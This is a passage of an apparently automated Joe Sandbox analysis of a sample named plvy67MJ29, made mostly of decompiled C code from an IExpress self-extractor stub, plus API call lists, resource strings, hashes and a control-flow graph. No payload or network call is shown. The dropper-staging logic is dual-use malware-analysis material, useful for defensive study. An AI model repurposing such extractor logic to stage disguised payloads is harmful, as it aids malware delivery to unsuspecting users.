                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t145;
                                                                                                                                                                                                    											if(_t145 < 0) {
                                                                                                                                                                                                    												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                    												__eflags = _t104;
                                                                                                                                                                                                    												_v360 = _t104;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t98 =  *0xfd9a38; // 0x0
                                                                                                                                                                                                    											_v356 = _t98;
                                                                                                                                                                                                    											_t130 = _t146;
                                                                                                                                                                                                    											 *0xfda288( &_v384);
                                                                                                                                                                                                    											_t101 = _v404();
                                                                                                                                                                                                    											__eflags = _t164 - _t164;
                                                                                                                                                                                                    											if(_t164 != _t164) {
                                                                                                                                                                                                    												_t130 = 4;
                                                                                                                                                                                                    												asm("int 0x29");
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											 *0xfd9124 = _t101;
                                                                                                                                                                                                    											_push(_t129);
                                                                                                                                                                                                    											__eflags = _t101;
                                                                                                                                                                                                    											if(_t101 < 0) {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												goto L61;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												FreeLibrary();
                                                                                                                                                                                                    												_t127 = _v400;
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0xfd9a40 - 1; // 0x3
                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags =  *0xfd8a20;
                                                                                                                                                                                                    										if( *0xfd8a20 == 0) {
                                                                                                                                                                                                    											goto L37;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										__eflags = _t157;
                                                                                                                                                                                                    										if(_t157 != 0) {
                                                                                                                                                                                                    											goto L38;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    										E00FD202A(_t146); // executed
                                                                                                                                                                                                    										goto L37;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v280;
                                                                                                                                                                                                    									_t108 = E00FD468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                    									__eflags = _t108;
                                                                                                                                                                                                    									if(_t108 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0xfd8c42;
                                                                                                                                                                                                    									if( *0xfd8c42 != 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                    									__eflags = _t112 == 0;
                                                                                                                                                                                                    									if(_t112 == 0) {
                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L31;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t118 =  *0xfd8a38; // 0x0
                                                                                                                                                                                                    								if(_t118 == 0) {
                                                                                                                                                                                                    									L23:
                                                                                                                                                                                                    									if(_t153 != 0) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E00FD468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                    										goto L27;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L25;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                    									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                    									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "USRQCMD";
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                    									if(E00FD468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                    										_t153 = 1;
                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = "ADMQCMD";
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                    						_push(_t130);
                                                                                                                                                                                                    						_t146 = 0x104;
                                                                                                                                                                                                    						E00FD1781( &_v276, 0x104, _t130, 0xfd8c42);
                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t130 = "REBOOT";
                                                                                                                                                                                                    				_t125 = E00FD468F(_t130, 0xfd9a2c, 4);
                                                                                                                                                                                                    				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





























































                                                                                                                                                                                                    0x00fd3baa
                                                                                                                                                                                                    0x00fd3bb0
                                                                                                                                                                                                    0x00fd3bb7
                                                                                                                                                                                                    0x00fd3bc0
                                                                                                                                                                                                    0x00fd3bc2
                                                                                                                                                                                                    0x00fd3bc9
                                                                                                                                                                                                    0x00fd3bcb
                                                                                                                                                                                                    0x00fd3bcf
                                                                                                                                                                                                    0x00fd3bd3
                                                                                                                                                                                                    0x00fd3bd9
                                                                                                                                                                                                    0x00fd3bfd
                                                                                                                                                                                                    0x00fd3bfd
                                                                                                                                                                                                    0x00fd3bff
                                                                                                                                                                                                    0x00fd3c03
                                                                                                                                                                                                    0x00fd3c03
                                                                                                                                                                                                    0x00fd3c11
                                                                                                                                                                                                    0x00fd3c16
                                                                                                                                                                                                    0x00fd3c19
                                                                                                                                                                                                    0x00fd3c28
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c30
                                                                                                                                                                                                    0x00fd3c39
                                                                                                                                                                                                    0x00fd3c40
                                                                                                                                                                                                    0x00fd3d13
                                                                                                                                                                                                    0x00fd3d15
                                                                                                                                                                                                    0x00fd3d21
                                                                                                                                                                                                    0x00fd3d26
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c4f
                                                                                                                                                                                                    0x00fd3c56
                                                                                                                                                                                                    0x00fd3c60
                                                                                                                                                                                                    0x00fd3c65
                                                                                                                                                                                                    0x00fd3c77
                                                                                                                                                                                                    0x00fd3c78
                                                                                                                                                                                                    0x00fd3c7c
                                                                                                                                                                                                    0x00fd3c7e
                                                                                                                                                                                                    0x00fd3c82
                                                                                                                                                                                                    0x00fd3c82
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c7c
                                                                                                                                                                                                    0x00fd3c67
                                                                                                                                                                                                    0x00fd3c69
                                                                                                                                                                                                    0x00fd3c6d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c58
                                                                                                                                                                                                    0x00fd3c58
                                                                                                                                                                                                    0x00fd3c6e
                                                                                                                                                                                                    0x00fd3c6e
                                                                                                                                                                                                    0x00fd3c87
                                                                                                                                                                                                    0x00fd3c89
                                                                                                                                                                                                    0x00fd3d4d
                                                                                                                                                                                                    0x00fd3d4f
                                                                                                                                                                                                    0x00fd3d50
                                                                                                                                                                                                    0x00fd3d52
                                                                                                                                                                                                    0x00fd3d9e
                                                                                                                                                                                                    0x00fd3da8
                                                                                                                                                                                                    0x00fd3daf
                                                                                                                                                                                                    0x00fd3db4
                                                                                                                                                                                                    0x00fd3db6
                                                                                                                                                                                                    0x00fd3f4d
                                                                                                                                                                                                    0x00fd3f4d
                                                                                                                                                                                                    0x00fd3f4f
                                                                                                                                                                                                    0x00fd3f56
                                                                                                                                                                                                    0x00fd3f57
                                                                                                                                                                                                    0x00fd3f58
                                                                                                                                                                                                    0x00fd3f63
                                                                                                                                                                                                    0x00fd3f63
                                                                                                                                                                                                    0x00fd3dbc
                                                                                                                                                                                                    0x00fd3dc0
                                                                                                                                                                                                    0x00fd3dc2
                                                                                                                                                                                                    0x00fd3de6
                                                                                                                                                                                                    0x00fd3de6
                                                                                                                                                                                                    0x00fd3de8
                                                                                                                                                                                                    0x00fd3f0b
                                                                                                                                                                                                    0x00fd3f0b
                                                                                                                                                                                                    0x00fd3f0f
                                                                                                                                                                                                    0x00fd3f13
                                                                                                                                                                                                    0x00fd3f15
                                                                                                                                                                                                    0x00fd3f1a
                                                                                                                                                                                                    0x00fd3f1c
                                                                                                                                                                                                    0x00fd3f46
                                                                                                                                                                                                    0x00fd3f47
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f47
                                                                                                                                                                                                    0x00fd3f1e
                                                                                                                                                                                                    0x00fd3f1f
                                                                                                                                                                                                    0x00fd3f25
                                                                                                                                                                                                    0x00fd3f26
                                                                                                                                                                                                    0x00fd3f2a
                                                                                                                                                                                                    0x00fd3f2d
                                                                                                                                                                                                    0x00fd3fd9
                                                                                                                                                                                                    0x00fd3fd9
                                                                                                                                                                                                    0x00fd3fda
                                                                                                                                                                                                    0x00fd3fda
                                                                                                                                                                                                    0x00fd3fe1
                                                                                                                                                                                                    0x00fd3fe3
                                                                                                                                                                                                    0x00fd3fe3
                                                                                                                                                                                                    0x00fd3fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3fe8
                                                                                                                                                                                                    0x00fd3f33
                                                                                                                                                                                                    0x00fd3f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f37
                                                                                                                                                                                                    0x00fd3dee
                                                                                                                                                                                                    0x00fd3dee
                                                                                                                                                                                                    0x00fd3df5
                                                                                                                                                                                                    0x00fd3fad
                                                                                                                                                                                                    0x00fd3fb9
                                                                                                                                                                                                    0x00fd3fc2
                                                                                                                                                                                                    0x00fd3fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3fc8
                                                                                                                                                                                                    0x00fd3dfb
                                                                                                                                                                                                    0x00fd3dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3e03
                                                                                                                                                                                                    0x00fd3e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3e15
                                                                                                                                                                                                    0x00fd3e17
                                                                                                                                                                                                    0x00fd3e19
                                                                                                                                                                                                    0x00fd3f94
                                                                                                                                                                                                    0x00fd3fa4
                                                                                                                                                                                                    0x00fd3f7c
                                                                                                                                                                                                    0x00fd3f80
                                                                                                                                                                                                    0x00fd3f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f8b
                                                                                                                                                                                                    0x00fd3e2c
                                                                                                                                                                                                    0x00fd3e30
                                                                                                                                                                                                    0x00fd3e34
                                                                                                                                                                                                    0x00fd3e36
                                                                                                                                                                                                    0x00fd3f69
                                                                                                                                                                                                    0x00fd3f6e
                                                                                                                                                                                                    0x00fd3f70
                                                                                                                                                                                                    0x00fd3f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f76
                                                                                                                                                                                                    0x00fd3e3c
                                                                                                                                                                                                    0x00fd3e43
                                                                                                                                                                                                    0x00fd3e47
                                                                                                                                                                                                    0x00fd3e52
                                                                                                                                                                                                    0x00fd3e56
                                                                                                                                                                                                    0x00fd3e5c
                                                                                                                                                                                                    0x00fd3e61
                                                                                                                                                                                                    0x00fd3e68
                                                                                                                                                                                                    0x00fd3e70
                                                                                                                                                                                                    0x00fd3e74
                                                                                                                                                                                                    0x00fd3e7c
                                                                                                                                                                                                    0x00fd3e80
                                                                                                                                                                                                    0x00fd3e82
                                                                                                                                                                                                    0x00fd3e82
                                                                                                                                                                                                    0x00fd3e87
                                                                                                                                                                                                    0x00fd3e87
                                                                                                                                                                                                    0x00fd3e8b
                                                                                                                                                                                                    0x00fd3e91
                                                                                                                                                                                                    0x00fd3e94
                                                                                                                                                                                                    0x00fd3e96
                                                                                                                                                                                                    0x00fd3e96
                                                                                                                                                                                                    0x00fd3e9b
                                                                                                                                                                                                    0x00fd3e9b
                                                                                                                                                                                                    0x00fd3e9f
                                                                                                                                                                                                    0x00fd3ea2
                                                                                                                                                                                                    0x00fd3ea4
                                                                                                                                                                                                    0x00fd3ea4
                                                                                                                                                                                                    0x00fd3ea9
                                                                                                                                                                                                    0x00fd3ea9
                                                                                                                                                                                                    0x00fd3ead
                                                                                                                                                                                                    0x00fd3eb3
                                                                                                                                                                                                    0x00fd3eb6
                                                                                                                                                                                                    0x00fd3eb8
                                                                                                                                                                                                    0x00fd3eb8
                                                                                                                                                                                                    0x00fd3ebd
                                                                                                                                                                                                    0x00fd3ebd
                                                                                                                                                                                                    0x00fd3ec1
                                                                                                                                                                                                    0x00fd3ec3
                                                                                                                                                                                                    0x00fd3ec5
                                                                                                                                                                                                    0x00fd3ec5
                                                                                                                                                                                                    0x00fd3eca
                                                                                                                                                                                                    0x00fd3eca
                                                                                                                                                                                                    0x00fd3ece
                                                                                                                                                                                                    0x00fd3ed5
                                                                                                                                                                                                    0x00fd3ed9
                                                                                                                                                                                                    0x00fd3ee0
                                                                                                                                                                                                    0x00fd3ee6
                                                                                                                                                                                                    0x00fd3eea
                                                                                                                                                                                                    0x00fd3eec
                                                                                                                                                                                                    0x00fd3eee
                                                                                                                                                                                                    0x00fd3ef3
                                                                                                                                                                                                    0x00fd3ef3
                                                                                                                                                                                                    0x00fd3ef5
                                                                                                                                                                                                    0x00fd3efa
                                                                                                                                                                                                    0x00fd3efb
                                                                                                                                                                                                    0x00fd3efd
                                                                                                                                                                                                    0x00fd3f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3eff
                                                                                                                                                                                                    0x00fd3eff
                                                                                                                                                                                                    0x00fd3f05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f05
                                                                                                                                                                                                    0x00fd3efd
                                                                                                                                                                                                    0x00fd3dc7
                                                                                                                                                                                                    0x00fd3dce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3dd0
                                                                                                                                                                                                    0x00fd3dd7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3dd9
                                                                                                                                                                                                    0x00fd3ddb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3ddd
                                                                                                                                                                                                    0x00fd3de1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3de1
                                                                                                                                                                                                    0x00fd3d59
                                                                                                                                                                                                    0x00fd3d65
                                                                                                                                                                                                    0x00fd3d6a
                                                                                                                                                                                                    0x00fd3d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3d6e
                                                                                                                                                                                                    0x00fd3d75
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3d8f
                                                                                                                                                                                                    0x00fd3d96
                                                                                                                                                                                                    0x00fd3d98
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3d98
                                                                                                                                                                                                    0x00fd3c8f
                                                                                                                                                                                                    0x00fd3c98
                                                                                                                                                                                                    0x00fd3cf1
                                                                                                                                                                                                    0x00fd3cf3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3cfe
                                                                                                                                                                                                    0x00fd3d11
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3d11
                                                                                                                                                                                                    0x00fd3c9c
                                                                                                                                                                                                    0x00fd3ca5
                                                                                                                                                                                                    0x00fd3ca7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3cad
                                                                                                                                                                                                    0x00fd3cb2
                                                                                                                                                                                                    0x00fd3cb7
                                                                                                                                                                                                    0x00fd3cc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3ce8
                                                                                                                                                                                                    0x00fd3cec
                                                                                                                                                                                                    0x00fd3ced
                                                                                                                                                                                                    0x00fd3ced
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3ce8
                                                                                                                                                                                                    0x00fd3c9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3c9e
                                                                                                                                                                                                    0x00fd3c56
                                                                                                                                                                                                    0x00fd3d35
                                                                                                                                                                                                    0x00fd3d35
                                                                                                                                                                                                    0x00fd3d3c
                                                                                                                                                                                                    0x00fd3d48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3d48
                                                                                                                                                                                                    0x00fd3c03
                                                                                                                                                                                                    0x00fd3be2
                                                                                                                                                                                                    0x00fd3be7
                                                                                                                                                                                                    0x00fd3bee
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00FD3C11
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00FD3CDC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00FD8C42), ref: 00FD3D8F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00FD3E26
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00FD8C42), ref: 00FD3EFF
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00FD8C42), ref: 00FD3F1F
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00FD8C42), ref: 00FD3F40
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00FD8C42), ref: 00FD3F47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00FD8C42), ref: 00FD3F76
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00FD8C42), ref: 00FD3F80
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00FD8C42), ref: 00FD3FC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
                                                                                                                                                                                                    • API String ID: 1032054927-3080307452
                                                                                                                                                                                                    • Opcode ID: 1a01640cfab9113b45fd264706eb40b0dbb18de98d2c17e35d946beb20406186
                                                                                                                                                                                                    • Instruction ID: a6bfd0015b4caa3f34561e9c7a6ffe160864d84b5a0893493cc0e8d5a0abe6c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a01640cfab9113b45fd264706eb40b0dbb18de98d2c17e35d946beb20406186
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51B10071A093099BD3249F748845B2B77E7AB84760F08092BFA85D6390DB75C944FB93
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 141 fd1ae8-fd1b2c call fd1680 144 fd1b2e-fd1b39 141->144 145 fd1b3b-fd1b40 141->145 146 fd1b46-fd1b61 call fd1a84 144->146 145->146 149 fd1b9f-fd1bc2 call fd1781 call fd658a 146->149 150 fd1b63-fd1b65 146->150 159 fd1bc7-fd1bd3 call fd66c8 149->159 151 fd1b68-fd1b6d 150->151 151->151 153 fd1b6f-fd1b74 151->153 153->149 155 fd1b76-fd1b7b 153->155 157 fd1b7d-fd1b81 155->157 158 fd1b83-fd1b86 155->158 157->158 160 fd1b8c-fd1b9d call fd1680 157->160 158->149 161 fd1b88-fd1b8a 158->161 165 fd1bd9-fd1bf1 CompareStringA 159->165 166 fd1d73-fd1d7f call fd66c8 159->166 160->159 161->149 161->160 165->166 168 fd1bf7-fd1c07 GetFileAttributesA 165->168 174 fd1df8-fd1e09 LocalAlloc 166->174 175 fd1d81-fd1d99 CompareStringA 166->175 170 fd1c0d-fd1c15 168->170 171 fd1d53-fd1d5e 168->171 170->171 173 fd1c1b-fd1c33 call fd1a84 170->173 176 fd1d64-fd1d6e call fd44b9 171->176 189 fd1c35-fd1c38 173->189 190 fd1c50-fd1c61 LocalAlloc 173->190 177 fd1e0b-fd1e1b GetFileAttributesA 174->177 178 fd1dd4-fd1ddf 174->178 175->174 181 fd1d9b-fd1da2 175->181 188 fd1e94-fd1ea4 call fd6ce0 176->188 182 fd1e1d-fd1e1f 177->182 183 fd1e67-fd1e73 call fd1680 177->183 178->176 186 fd1da5-fd1daa 181->186 182->183 187 fd1e21-fd1e3e call fd1781 182->187 199 fd1e78-fd1e84 call fd2aac 183->199 186->186 191 fd1dac-fd1db4 186->191 187->199 207 fd1e40-fd1e43 187->207 195 fd1c3a 189->195 196 fd1c40-fd1c4b call fd1a84 189->196 190->178 198 fd1c67-fd1c72 190->198 197 fd1db7-fd1dbc 191->197 195->196 196->190 197->197 203 fd1dbe-fd1dd2 LocalAlloc 197->203 204 fd1c79-fd1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 fd1c74 198->205 211 fd1e89-fd1e92 199->211 203->178 208 fd1de1-fd1df3 call fd171e 203->208 209 fd1cf8-fd1d07 204->209 210 fd1cc2-fd1ccc 204->210 205->204 207->199 214 fd1e45-fd1e65 call fd16b3 * 2 207->214 208->211 215 fd1d09-fd1d21 GetShortPathNameA 209->215 216 fd1d23 209->216 212 fd1cce 210->212 213 fd1cd3-fd1cf3 call fd1680 * 2 210->213 211->188 212->213 213->211 214->199 220 fd1d28-fd1d2b 215->220 216->220 224 fd1d2d 220->224 225 fd1d32-fd1d4e call fd171e 220->225 224->225 225->211
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00FD1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                    				CHAR* _t92;
                                                                                                                                                                                                    				char _t105;
                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                    				CHAR** _t111;
                                                                                                                                                                                                    				CHAR* _t115;
                                                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                    				CHAR* _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                    				E00FD1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                    				_t54 = E00FD1A84(_t111, _t135);
                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                    					E00FD1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                    					E00FD658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						E00FD1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                    						_t57 = E00FD66C8(_t156, _t138);
